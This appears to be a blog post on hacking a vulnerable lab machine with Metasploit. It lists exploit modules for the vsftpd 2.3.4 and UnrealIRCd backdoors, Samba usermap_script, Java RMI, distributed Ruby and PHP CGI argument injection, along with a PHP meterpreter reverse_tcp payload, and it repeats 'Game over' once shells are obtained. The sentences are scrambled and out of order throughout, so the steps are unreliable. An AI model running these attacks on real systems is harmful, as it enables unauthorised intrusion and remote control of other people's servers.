(You will find something on target like port ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp is open) Press Ctrl+ C then type Y and exit again to abort the session Msf> use exploit/multi/ samba/usermap_script Msf> info exploit/multi/samba/usermap_script (You will find something netbios-ssn on target and port 139/tcp is open) Samba -username map script- Remote Command Execution Type exit and exit again to abort the session (Game over) you will get meterpreter session and can type following commands in remote host session Msf> use exploit/multi/misc/java_rmi_server Msf> info exploit/multi/misc/java_rmi_server (You will find something rmiregistry on target and port 1099/tcp is open) (Game over) you can type following commands in remote host session Msf> use exploit/linux/misc/drb_remote_codeexec Msf> info exploit/linux/misc/drb_remote_codeexec (You can see ruby and druby service is running) (You will find something unknown on target and port 8787/tcp is open) (You can now see the source codes for index.php. You will get meterpreter session on which you can run several remote shell commands like below. Msf> set payload php/meterpreter/reverse_tcp Msf> use exploit/multi/http/php_cgi_arg_injection Msf> info exploit/multi/http/php_cgi_arg_injection (You will get PHP MyAdmin page and if you type Type IP address of vulnerable web server like it will show server side coding) Type IP address of vulnerable web server like (You will find if there is an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on target and port 80 is open) Hacking Web Server via PHP CGI Argument Injection: (You will get list of all available payloads) Msf> info exploit/unix/irc/unreal_ircd_3281_backdoor Msf> use exploit/unix/irc/unreal_ircd_3281_backdoor (You will find if there is Unreal ircd on target and port 6667 is open) Open terminal and run Metasploit msfconsole or run from backtrack menu Hacking UNIX Server via Unreal lRCD 3.2.8.1 backdoor: You can run the following commands on victim shell (Game over your target victim is under your control and victim’s terminal shell) Msf> info exploit/unix/ftp/vsftp_234_backdoor Msf> use exploit/unix/ftp/vsftp_234_backdoor (You will find if there is a FTP on target and port 21 is open)
Open terminal and run Metasploit msfconsole or run from backtrack menu
0 kommentar(er)
